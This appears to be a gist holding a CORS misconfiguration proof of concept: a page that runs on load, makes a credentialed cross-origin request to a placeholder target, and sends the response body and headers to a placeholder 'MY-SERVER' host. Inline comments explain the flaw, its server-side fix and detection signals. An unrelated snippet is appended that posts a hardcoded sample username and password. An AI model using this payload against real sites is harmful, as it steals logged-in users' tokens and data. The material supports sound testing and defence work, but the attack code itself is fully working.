@SleepyLctl
Last active August 14, 2018 06:07
CORS Token PoC
<!DOCTYPE html>
<html>
<head>
<script>
function hack()
{
// What this PoC demonstrates, read from the defender's side: this page is
// meant to be served from an origin that is foreign to "CLIENT URL". The
// credentialed cross-origin read below can only succeed if the target
// answers with an Access-Control-Allow-Origin that matches this page's
// origin AND Access-Control-Allow-Credentials: true. A server that reflects
// arbitrary Origin values while allowing credentials is the
// misconfiguration being tested. Server-side fix: compare Origin against an
// exact-match allow-list, never echo it back, and never pair a wildcard or
// reflected origin with Allow-Credentials.
var xmlhttp;
// Legacy transport selection; ActiveXObject is the old IE fallback.
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
//Target URL
// Synchronous GET (third argument false) sent with the victim's cookies
// attached; "CLIENT URL" is a placeholder for the endpoint under test.
xmlhttp.open("GET","CLIENT URL",false);
xmlhttp.withCredentials=true;
xmlhttp.send();
if(xmlhttp.status==200)
{
// Reading responseText here is exactly what the same-origin policy blocks
// when CORS is configured correctly. Cross-origin, getAllResponseHeaders()
// only yields CORS-safelisted headers plus those the server lists in
// Access-Control-Expose-Headers; Set-Cookie is never exposed to script.
var str=xmlhttp.responseText;
//FIXED: Thanks to @sleepylctl
var bla = xmlhttp.getAllResponseHeaders();
//Locating the target string in the HTML response
//var n=str.search("CSRFToken");
//Extracting the token
//var c=str.substring(n+38,n+74);
//Displaying the token in the server logs
// Exfiltration step: the captured headers and body leave the browser in the
// query string of a request to "MY-SERVER" (placeholder). Detection signal
// for the target application: credentialed requests whose Origin header is
// not one of its own origins, especially to endpoints that return session
// or CSRF tokens. CSP on the application's own pages does not help here,
// because the request is issued from the attacker-controlled page.
var url = "MY-SERVER//token-is?RESPONSE-Token: " + bla + " Body: " + str;
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
}
</script>
</head>
<body onload="hack();"></body>
</html>
// Legacy cross-browser XHR bootstrap: prefer the native XMLHttpRequest,
// fall back to the IE ActiveX control, and settle on null when neither
// constructor exists (for example outside a browser).
var myXMLHttpRequest = null;
try {
  myXMLHttpRequest = new XMLHttpRequest();
} catch (error) {
  try {
    myXMLHttpRequest = new ActiveXObject("Microsoft.XMLHTTP");
  } catch (error) {
    myXMLHttpRequest = null;
  }
}
// Asynchronous form-encoded POST to a same-origin endpoint. The body embeds
// a username and password ("jmeno"/"heslo") as literal values; anything
// written here is readable by every visitor of the page, so such values can
// only ever be sample placeholders, never real credentials.
if (myXMLHttpRequest) {
  myXMLHttpRequest.open("POST", "/skript.php", true);
  myXMLHttpRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  myXMLHttpRequest.send("jmeno=Tonda&heslo=pass123");
}